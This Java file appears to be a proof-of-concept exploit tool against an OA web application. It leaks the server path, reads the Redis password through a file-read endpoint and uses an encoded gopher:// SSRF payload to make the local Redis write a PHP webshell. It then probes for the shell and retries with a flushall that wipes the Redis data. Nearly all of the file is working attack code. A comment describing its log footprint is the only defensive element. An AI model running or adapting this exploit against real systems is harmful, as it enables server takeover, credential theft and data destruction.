package com.xinyu.poc;

import com.xinyu.tools.Other;
import com.xinyu.tools.Request;
import com.xinyu.tools.Response;

import java.awt.*;
import java.util.regex.Pattern;

/**
 * Proof-of-concept class that chains several HTTP GET requests against the host
 * given by {@code url}: it first reads a path out of one endpoint, then reads a
 * Redis password out of a file fetched through another, then submits a long
 * percent-encoded payload through a third, and finally probes for a randomly named
 * {@code .php} file to decide whether the attempt worked.
 *
 * <p>Detection note: the request sequence issued by {@link #poc1} — {@code getTableStruc.php},
 * {@code photo.php} with a file path in {@code AVATAR_FILE}, {@code img_download.php} with a
 * very long percent-encoded {@code ATTACHMENTS} value, followed by probes for a random
 * {@code .php} name — is the footprint this code leaves in web-server access logs.
 */
public class RedisSSRF {
    /**
     * Runs the request chain described on the class and reports progress to the caller.
     *
     * @param url      base URL of the host; endpoint paths are appended directly after it,
     *                 so it is expected without a trailing slash
     * @param cookie   passed through unchanged to {@code Request.get}; how it is sent is
     *                 not visible here — presumably as the request's Cookie header
     * @param textArea receives human-readable progress lines via {@code append}; no null
     *                 check is performed, so a null argument throws at the first append
     * @return the URL of the probed {@code .php} file (with a trailing password line) when
     *         the final probe body contains the random filename; {@code null} when the Redis
     *         password could not be read or both probes fail
     */
    public static String poc1(String url, String cookie, TextArea textArea) {
        String shell_url = null;
        //1. Fetch the root path
        Response response = Request.get(url + "/general/approve_center/archive/getTableStruc.php", cookie);
        // Sample response fragment the regex below is matched against:
        //"logPath": "C:/MYOA\\logs\\Workflow\\Log_2021_03_08.log",
        String web_path = Other.dataCleaning(response.getText(), Pattern.compile("\"logPath\": \"(.+?)\\\\"));
        System.out.println("\n获取的根路径: " + web_path);

        //The current user's privileges allow obtaining the physical path;
        //dataCleaning is assumed to return null on no match (not visible here) — TODO confirm
        if (web_path == null) {
            textArea.append("\n获取物理路径失败|尝试测试默认值-->D:/MYOA");
            web_path = "D:/MYOA";
        } else {
            textArea.append("\n获取物理路径成功-->" + web_path);
        }

        //2. Read the Redis password: the config file is fetched via the AVATAR_FILE
        //parameter and the requirepass line is extracted (the pattern expects a CR terminator)
        String requirepass;
        Response response2 = Request.get(url + "/ispirit/im/photo.php?UID=1&AVATAR_FILE=" + web_path + "/bin/redis.windows.conf", cookie);
        requirepass = Other.dataCleaning(response2.getText(), Pattern.compile("requirepass (.+?)\r"));
        if (requirepass != null) {
            textArea.append("\n读取Redis密码成功-->" + requirepass);
            System.out.println(requirepass);

            //Lengths embedded into the payload below; the +8 and +18 offsets account for
            //the path suffixes appended after web_path inside the payload
            int requirepass_len = requirepass.length();
            int web_path_len = web_path.length() + 8;
            int log_path_len = web_path.length() + 18;
            System.out.println(requirepass_len);

            //3. Redis/SSRF/gopher protocol: write a file
            //The payload is a percent-encoded gopher:// URL into which the password, the
            //computed lengths, web_path and random_filename are spliced as-is (no escaping)
            String random_filename = Other.getRandomFileName();
            System.out.println(random_filename);
            String payload = "%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%36%33%39%39%2f%5f%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%34%31%25%35%35%25%35%34%25%34%38%25%30%64%25%30%61%25%32%34" + requirepass_len + "%25%30%64%25%30%61" + requirepass + "%25%30%64%25%30%61%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%33%37%25%30%64%25%30%61%25%32%61%25%33%33%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%37%38%25%30%64%25%30%61%25%32%34%25%33%32%25%33%30%25%33%32%25%30%64%25%30%61%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%36%25%36%39%25%36%63%25%36%35%25%35%66%25%37%30%25%37%35%25%37%34%25%35%66%25%36%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%37%33%25%32%38%25%32%34%25%35%66%25%35%33%25%34%35%25%35%32%25%35%36%25%34%35%25%35%32%25%35%62%25%32%32%25%34%34%25%34%66%25%34%33%25%35%35%25%34%64%25%34%35%25%34%65%25%35%34%25%35%66%25%35%32%25%34%66%25%34%66%25%35%34%25%32%32%25%35%64%25%32%65%25%32%32%25%32%66%25%32%66" + random_filename + ".php" + 
"%25%32%32%25%32%63%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%35%66%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%38%25%32%32%25%35%30%25%34%34%25%33%39%25%37%37%25%36%31%25%34%38%25%34%31%25%36%37%25%34%61%25%34%37%25%34%35%25%33%39%25%34%39%25%36%65%25%33%34%25%37%32%25%35%61%25%34%33%25%36%37%25%37%30%25%34%39%25%36%63%25%33%34%25%36%39%25%34%39%25%35%38%25%37%33%25%37%32%25%36%35%25%33%33%25%33%30%25%36%39%25%34%66%25%37%39%25%35%32%25%36%39%25%35%30%25%35%33%25%35%32%25%33%37%25%34%61%25%34%37%25%34%36%25%33%39%25%35%37%25%37%39%25%34%61%25%33%34%25%34%39%25%36%63%25%33%30%25%33%37%25%35%61%25%35%38%25%35%61%25%36%38%25%36%32%25%34%33%25%36%37%25%36%39%25%34%39%25%36%39%25%33%34%25%36%62%25%35%39%25%36%39%25%36%62%25%33%37%25%35%30%25%37%61%25%33%34%25%33%64%25%32%32%25%32%39%25%32%65%25%32%32" + random_filename + "%25%32%32%25%32%39%25%33%62%25%33%66%25%33%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%37%35%25%36%65%25%36%63%25%36%39%25%36%65%25%36%62%25%32%38%25%35%66%25%35%66%25%34%36%25%34%39%25%34%63%25%34%35%25%35%66%25%35%66%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34" + web_path_len + "%25%30%64%25%30%61" + web_path + 
"%25%32%66%25%37%37%25%36%35%25%36%32%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%31%25%33%31%25%30%64%25%30%61%25%33%32%25%36%65%25%33%38%25%35%37%25%35%37%25%33%38%25%34%35%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%32%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%35%25%36%63%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%37%38%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34" + log_path_len + "%25%30%64%25%30%61" + web_path + 
"%25%32%66%25%36%31%25%37%34%25%37%34%25%36%31%25%36%33%25%36%38%25%32%66%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%35%66%25%36%34%25%36%31%25%37%34%25%36%31%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%38%25%30%64%25%30%61%25%36%34%25%37%35%25%36%64%25%37%30%25%32%65%25%37%32%25%36%34%25%36%32%25%30%64%25%30%61%25%32%61%25%33%30%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34%25%30%64%25%30%61";
            //The payload travels in the ATTACHMENTS query parameter of img_download.php
            Request.get(url + "/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=" + payload, cookie);
            //Fixed-name request issued without the cookie; its role is not explained here — TODO confirm
            Request.get(url + "/2n8WW8E.php");
            //Probe for the random filename; getText() is assumed non-null on a miss — TODO confirm
            Response response3 = Request.get(url + "/" + random_filename + ".php");
            if (response3.getText().contains(random_filename)) {
                System.out.println("利用成功");
                shell_url = url + "/" + random_filename + ".php\n密码:x";
            } else {
                //Reaching this point means the file Redis generated contains too much dirty data for the PHP code to run
                //A flushall command is issued here to clear the Redis cache and retry
                textArea.append("\nRedis生成文件脏数据过多|尝试执行其flushall命令");
                System.out.println("这里会执行flushall命令,清空redis缓存数据尝试重新利用");
                //Second payload: same structure as the first with a flushall step added
                payload = "%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%36%33%39%39%2f%5f%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%34%31%25%35%35%25%35%34%25%34%38%25%30%64%25%30%61%25%32%34" + requirepass_len + "%25%30%64%25%30%61" + requirepass + "%25%30%64%25%30%61%25%32%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%38%25%30%64%25%30%61%25%36%36%25%36%63%25%37%35%25%37%33%25%36%38%25%36%31%25%36%63%25%36%63%25%30%64%25%30%61%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%33%37%25%30%64%25%30%61%25%32%61%25%33%33%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%37%38%25%30%64%25%30%61%25%32%34%25%33%32%25%33%30%25%33%32%25%30%64%25%30%61%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%36%25%36%39%25%36%63%25%36%35%25%35%66%25%37%30%25%37%35%25%37%34%25%35%66%25%36%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%37%33%25%32%38%25%32%34%25%35%66%25%35%33%25%34%35%25%35%32%25%35%36%25%34%35%25%35%32%25%35%62%25%32%32%25%34%34%25%34%66%25%34%33%25%35%35%25%34%64%25%34%35%25%34%65%25%35%34%25%35%66%25%35%32%25%34%66%25%34%66%25%35%34%25%32%32%25%35%64%25%32%65%25%32%32%25%32%66%25%32%66" + random_filename + 
"%25%32%65%25%37%30%25%36%38%25%37%30%25%32%32%25%32%63%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%35%66%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%38%25%32%32%25%35%30%25%34%34%25%33%39%25%37%37%25%36%31%25%34%38%25%34%31%25%36%37%25%34%61%25%34%37%25%34%35%25%33%39%25%34%39%25%36%65%25%33%34%25%37%32%25%35%61%25%34%33%25%36%37%25%37%30%25%34%39%25%36%63%25%33%34%25%36%39%25%34%39%25%35%38%25%37%33%25%37%32%25%36%35%25%33%33%25%33%30%25%36%39%25%34%66%25%37%39%25%35%32%25%36%39%25%35%30%25%35%33%25%35%32%25%33%37%25%34%61%25%34%37%25%34%36%25%33%39%25%35%37%25%37%39%25%34%61%25%33%34%25%34%39%25%36%63%25%33%30%25%33%37%25%35%61%25%35%38%25%35%61%25%36%38%25%36%32%25%34%33%25%36%37%25%36%39%25%34%39%25%36%39%25%33%34%25%36%62%25%35%39%25%36%39%25%36%62%25%33%37%25%35%30%25%37%61%25%33%34%25%33%64%25%32%32%25%32%39%25%32%65%25%32%32" + random_filename + "%25%32%32%25%32%39%25%33%62%25%33%66%25%33%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%37%35%25%36%65%25%36%63%25%36%39%25%36%65%25%36%62%25%32%38%25%35%66%25%35%66%25%34%36%25%34%39%25%34%63%25%34%35%25%35%66%25%35%66%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34" + web_path_len + "%25%30%64%25%30%61" + web_path + 
"%25%32%66%25%37%37%25%36%35%25%36%32%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%31%25%33%31%25%30%64%25%30%61%25%33%32%25%36%65%25%33%38%25%35%37%25%35%37%25%33%38%25%34%35%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%32%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%35%25%36%63%25%30%64%25%30%61%25%32%34%25%33%31%25%30%64%25%30%61%25%37%38%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34" + log_path_len + "%25%30%64%25%30%61" + web_path + 
"%25%32%66%25%36%31%25%37%34%25%37%34%25%36%31%25%36%33%25%36%38%25%32%66%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%35%66%25%36%34%25%36%31%25%37%34%25%36%31%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%38%25%30%64%25%30%61%25%36%34%25%37%35%25%36%64%25%37%30%25%32%65%25%37%32%25%36%34%25%36%32%25%30%64%25%30%61%25%32%61%25%33%30%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34%25%30%64%25%30%61";
                Request.get(url + "/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=" + payload, cookie);
                Request.get(url + "/2n8WW8E.php");
                //Second probe; on a miss shell_url stays null and the method reports failure via its return value only
                Response response4 = Request.get(url + "/" + random_filename + ".php");
                if (response4.getText().contains(random_filename)) {
                    System.out.println("利用成功");

                    shell_url = url + "/" + random_filename + ".php\n密码:x";
                    System.out.println(shell_url);
                }
            }
        }
        return shell_url;
    }
}
